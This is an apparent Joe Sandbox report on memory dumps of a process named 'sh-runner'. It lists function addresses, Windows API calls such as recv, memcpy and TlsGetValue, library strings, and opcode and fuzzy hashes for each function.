Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: AddressSingleValueWake
String ID: assertion failed: is_unlocked(state)
API String ID: 741412973-3502192491
Opcode ID: 23bfee41d53f48bfe86db273fd7076ee8176e7753bdf13d3cd2adad824054417
Instruction ID: 8c623b18387bbe39a4634a9a16d96beb92f2d23cfeaf07bfc7db6500733735d4
Opcode Fuzzy Hash: 23bfee41d53f48bfe86db273fd7076ee8176e7753bdf13d3cd2adad824054417
Instruction Fuzzy Hash: F4217421F0A4968BF72E665DAC003F99151DFD8759FA4C034DE0D472A5DD2DA9C38B90

Function 00007FF72BD14A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FF72BD14AB0

Part of subcall function 00007FF72BD04470: memset.MSVCRT ref: 00007FF72BD04494
Part of subcall function 00007FF72BD04470: WSASocketW.WS2_32 ref: 00007FF72BD044D5

Strings

assertion failed: socket != sys::c::INVALID_SOCKET as RawSocketstd\src\os\windows\io\socket.rs, xrefs: 00007FF72BD14A77

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Socketmemsetrecv
String ID: assertion failed: socket != sys::c::INVALID_SOCKET as RawSocketstd\src\os\windows\io\socket.rs
API String ID: 1952720251-765684447
Opcode ID: c87d3782ade94329c49124aaa88e3021b04a82a06ab70fd5b34bbb251caef58b
Instruction ID: 6920cb5fd5183971737b56a7277018d2fbc4ca51c7b3098725b4d3e6c4c7318a
Opcode Fuzzy Hash: c87d3782ade94329c49124aaa88e3021b04a82a06ab70fd5b34bbb251caef58b
Instruction Fuzzy Hash: F601F921B5998289FB28727DA8413F99251DB84738FA85331D97D467F0DE2CF5818E24

Function 00007FF72BD6AC10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF72BD6AC90

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF72BD6AC77
Unknown error, xrefs: 00007FF72BD6ACFC

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 9f23c45abf64fbacbe6a0a0f21fe03d62fd103c67be2481a929507254058cce8
Instruction ID: 88b908502baf5943e6fe98acef9b5dc32673661de24a6f86c2e669a285bf7b6d
Opcode Fuzzy Hash: 9f23c45abf64fbacbe6a0a0f21fe03d62fd103c67be2481a929507254058cce8
Instruction Fuzzy Hash: 0E017062D0CF8582D605AF1CAC011FAB320FB5E749F559335EA8C26125DF28E682CB10

Function 00007FF72BD6ACE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF72BD6AC90

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF72BD6AC77
The result is too small to be represented (UNDERFLOW), xrefs: 00007FF72BD6ACE0

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: d47faca273fee3eb08652286ba7156c53cd7e91152ecfc3982f4c63b94e46008
Instruction ID: c0dbf88ed3d24cceb64ee2d5002c5eef37e9a1f866f625d264c3fe4e7fd461c8
Opcode Fuzzy Hash: d47faca273fee3eb08652286ba7156c53cd7e91152ecfc3982f4c63b94e46008
Instruction Fuzzy Hash: F4F06256D08E8882D206AF2CA8010EBB330FF4D788F545335EE8D26165DF28E682CB10

Function 00007FF72BD6ACF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF72BD6AC90

Strings

Total loss of significance (TLOSS), xrefs: 00007FF72BD6ACF0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF72BD6AC77

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 654fe18368314048296bdca04a1506cf58bf7ededbd10768bb3a05801da12397
Instruction ID: 69080ae37d980a72d9dd3ad3f8f623db6256b67226ab1e123765a8c303624482
Opcode Fuzzy Hash: 654fe18368314048296bdca04a1506cf58bf7ededbd10768bb3a05801da12397
Instruction Fuzzy Hash: 12F06256D08E8886D206AF2CA8010EBB330FF4D789F545336EE8D26525DF28E6828B10

Function 00007FF72BD6ACC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF72BD6AC90

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF72BD6ACC0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF72BD6AC77

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: cc15266162407a88aa47b9f831956226476d6312fc5f7b2ab81cfc402f8cf8eb
Instruction ID: 30518e7780b06c2b81e25abbc9ff98074cfb9ec21f9d7fc8e00df32cec419d67
Opcode Fuzzy Hash: cc15266162407a88aa47b9f831956226476d6312fc5f7b2ab81cfc402f8cf8eb
Instruction Fuzzy Hash: 40F06256D08E8882D206AF2CA8010EBB330FF5D788F545335EE8D26165DF28E6828B10

Function 00007FF72BD6ACD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF72BD6AC90

Strings

Overflow range error (OVERFLOW), xrefs: 00007FF72BD6ACD0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF72BD6AC77

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: a3a07cbde992090d7d7b51d2974cdc157ef3de1d13c1c5e643ec34ef39ebd05a
Instruction ID: 7bf140a4cbc57aa3f438b7eac5fcac774e11e6423716d6b362eed024c64d6993
Opcode Fuzzy Hash: a3a07cbde992090d7d7b51d2974cdc157ef3de1d13c1c5e643ec34ef39ebd05a
Instruction Fuzzy Hash: 99F06256D08E8882D206AF2CA8010EBB330FF4D788F545335EE8D26165DF28E6828B10

Function 00007FF72BD6ACB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF72BD6AC90

Strings

Argument domain error (DOMAIN), xrefs: 00007FF72BD6ACB0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF72BD6AC77

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 9d7587cdb4e71efc7c1c888ce97e11677cfee7c1fcdc9252f9f345f0b25ff5e1
Instruction ID: cbe424f27abf4d26dd3d41b98d36361cccf678be02eab77110174ce4fe3046c6
Opcode Fuzzy Hash: 9d7587cdb4e71efc7c1c888ce97e11677cfee7c1fcdc9252f9f345f0b25ff5e1
Instruction Fuzzy Hash: 82F06256D08E8882D206AF2CA8010EBB330FF4D788F545335EE8D36165DF28E6828B10

Function 00007FF72BD6AC48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF72BD6AC90

Strings

Argument singularity (SIGN), xrefs: 00007FF72BD6AC48
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF72BD6AC77

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 214d4933b2e71066d62eb04ac44e51b8fbdefb7d7834033a0a8b7dae9f3bc6b3
Instruction ID: c9ddeacd3ca8467f42cef4aeb9c2a84f53b775904445e8b31997f1e3e8be7564
Opcode Fuzzy Hash: 214d4933b2e71066d62eb04ac44e51b8fbdefb7d7834033a0a8b7dae9f3bc6b3
Instruction Fuzzy Hash: 60F01252D08E8882D2069F2CA8011ABB321FB5D799F545335EE8D2A525DF28E5828710

Function 00007FF72BCED750 Relevance: 5.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF72BCED835
memcpy.MSVCRT ref: 00007FF72BCED8C5
memcpy.MSVCRT ref: 00007FF72BCED951
memcpy.MSVCRT ref: 00007FF72BCED9D8

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a882803c6373b8140cb1acc5120529d81f49224bc1023e90e7337d7bf7ab2a11
Instruction ID: 4f6060ce67292374603811ed2cb25559b9d47573565d688bd0acb05ad360e44e
Opcode Fuzzy Hash: a882803c6373b8140cb1acc5120529d81f49224bc1023e90e7337d7bf7ab2a11
Instruction Fuzzy Hash: 97B1CE62A04B8185E740DF69E8003AD77A4F708FE8F448635DEAD17B99DF38D891D364

Function 00007FF72BD177B0 Relevance: 5.2, APIs: 4, Instructions: 202COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF72BD1780B
memcpy.MSVCRT ref: 00007FF72BD1792E
memcpy.MSVCRT ref: 00007FF72BD17A04
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00007FF72BD17A84

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcpy$CloseHandle
String ID:
API String ID: 2153058950-0
Opcode ID: 7cf7448aaedaa62c266b382c2fa0f3af08e02c37161cf059a5816205767e74f0
Instruction ID: 55e4216391699c5b3415901bb3e3d85d9a12405f15879aa5e5309daf80412456
Opcode Fuzzy Hash: 7cf7448aaedaa62c266b382c2fa0f3af08e02c37161cf059a5816205767e74f0
Instruction Fuzzy Hash: 1171E872615B4182FB19AF2AA9403E9A760FB48BC4F945035DF8D07BA2DF3DE1D68710

Function 00007FF72BD28560 Relevance: 5.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BD0E14E), ref: 00007FF72BD28582
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BD0E14E), ref: 00007FF72BD285E3
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BD0E14E), ref: 00007FF72BD285F3
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BD0E14E), ref: 00007FF72BD28642

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: f17577e6f870213ef3aa3de7ce3b1ecbdfc094bf71b1c554ff7e80671c820440
Instruction ID: 7c1e145d1e910904aa2f169eba97e90557ad4e99a5b51cf632adeb74ffa66d4a
Opcode Fuzzy Hash: f17577e6f870213ef3aa3de7ce3b1ecbdfc094bf71b1c554ff7e80671c820440
Instruction Fuzzy Hash: 8E317E22E4959242EE5D7B199E003F8A6A0EF88B81FC84435DE0D477E7DE2DB8514B60

Function 00007FF72BD28780 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF72BD287A2
TlsGetValue.KERNEL32 ref: 00007FF72BD28803
TlsSetValue.KERNEL32 ref: 00007FF72BD28813
TlsGetValue.KERNEL32 ref: 00007FF72BD28862

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4f9c0e8cf95e065e47eaac6043f039f9923d9f226e81e56263bbb65d041ed7a4
Instruction ID: b5b4623054aa60ba4a2d3cad5da89df5c50e4aef70cc4a01fc411ab92b271965
Opcode Fuzzy Hash: 4f9c0e8cf95e065e47eaac6043f039f9923d9f226e81e56263bbb65d041ed7a4
Instruction Fuzzy Hash: 65318D22F5D99242FA5D7A5DAD003F9D6A0EF88B80FC84435DE0D477E6DE2DB8418B60

Function 00007FF72BD28470 Relevance: 5.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BD0E14E,?,?,?,?,?,?,00007FF72BD0E7E9), ref: 00007FF72BD28492
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BD0E14E,?,?,?,?,?,?,00007FF72BD0E7E9), ref: 00007FF72BD284B6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BD0E14E,?,?,?,?,?,?,00007FF72BD0E7E9), ref: 00007FF72BD28509
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BD0E14E,?,?,?,?,?,?,00007FF72BD0E7E9), ref: 00007FF72BD28516

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d2c9f6836f61cd172c0b7c231a5a6352162b93bc84975687d09b25aa2e3d189c
Instruction ID: 1554d3c5ffca1f04c66b031685f073c842d1c0f2a45b97e828ef7f146746a037
Opcode Fuzzy Hash: d2c9f6836f61cd172c0b7c231a5a6352162b93bc84975687d09b25aa2e3d189c
Instruction Fuzzy Hash: D621B011F0D5D246FE5E7A296D003F9D991EF49B90FC84435DE4D477A2EE2EB8424B20

Function 00007FF72BD28690 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF72BD286B2
TlsGetValue.KERNEL32 ref: 00007FF72BD28708
TlsSetValue.KERNEL32 ref: 00007FF72BD28718
TlsGetValue.KERNEL32 ref: 00007FF72BD28751

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 34d87e71e1d26ee6304a37aee2e64596fe59a58b1bbfbbbe2566885a5bd73867
Instruction ID: 58f610c6f7bbf635906bca7014ad6aeea3886fed1f5083a6203ce081383b40ac
Opcode Fuzzy Hash: 34d87e71e1d26ee6304a37aee2e64596fe59a58b1bbfbbbe2566885a5bd73867
Instruction Fuzzy Hash: 44218E21F4999247FA5D3A1D9E003F9D291EF48B90FD84435DE4D477A2DE3EB8814B60

Function 00007FF72BCD4F00 Relevance: 5.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BCD4F17
CloseHandle.KERNEL32 ref: 00007FF72BCD4F1F
CloseHandle.KERNEL32 ref: 00007FF72BCD4F2E
CloseHandle.KERNEL32 ref: 00007FF72BCD4F3E

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: defbf50bacf0bd71fc855c0fe0aae662a69bb2d39f6492e28cdf4ead743cc2a7
Instruction ID: 51e743625738c4d5c51e38aa02e2d1d51b76981da5628dc66cc0966a15516792
Opcode Fuzzy Hash: defbf50bacf0bd71fc855c0fe0aae662a69bb2d39f6492e28cdf4ead743cc2a7
Instruction Fuzzy Hash: 7BF04412A4884283E639BA1EF8453B99260EB4D794F845035DB9D425F18F3CE4C2C710

Function 00007FF72BD04640 Relevance: 5.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD04662
CloseHandle.KERNEL32 ref: 00007FF72BD04672
CloseHandle.KERNEL32 ref: 00007FF72BD04682
CloseHandle.KERNEL32 ref: 00007FF72BD0468A

Memory Dump Source

